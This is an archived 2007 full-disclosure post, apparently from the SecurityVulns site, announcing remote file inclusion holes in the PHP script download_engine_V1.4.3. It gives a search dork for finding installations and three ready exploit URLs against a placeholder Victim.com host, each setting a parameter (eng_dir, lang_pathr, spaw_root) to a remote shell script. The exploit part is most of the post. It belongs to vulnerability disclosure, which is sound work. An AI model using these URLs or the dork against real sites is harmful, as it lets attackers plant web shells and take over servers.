Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  webMethods Security Advisory: Glue console directory traversal vu lnerability

  [Full-disclosure] Persistent CSRF and The Hotlink Hell

  PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities

  Remot File Include In Script phphd_downloads

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:17 апреля 2007 г.
Subject:Remot File Include download_engine_V1.4.3

By Hasadya Raed
Contact : RaeD@BsdMail.Com
Israel
--------------------------
Script : download_engine_V1.4.3
Dork : (c) 2002 AlexScriptEngine
--------------------------
B.Files :
addmember.php
class.phpmailer.php
colorpicker.php
--------------------------
Exploits :
http://www.Victim.com/download_engine_V1.4.3/addmember.php?eng_dir=[Shell-
Attack]

http://www.Victim.com/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?
lang_pathr=
[Shell-Attack]

http://www.Victim.com/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpic
ker.php?spaw_root=
[Shell-Attack]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server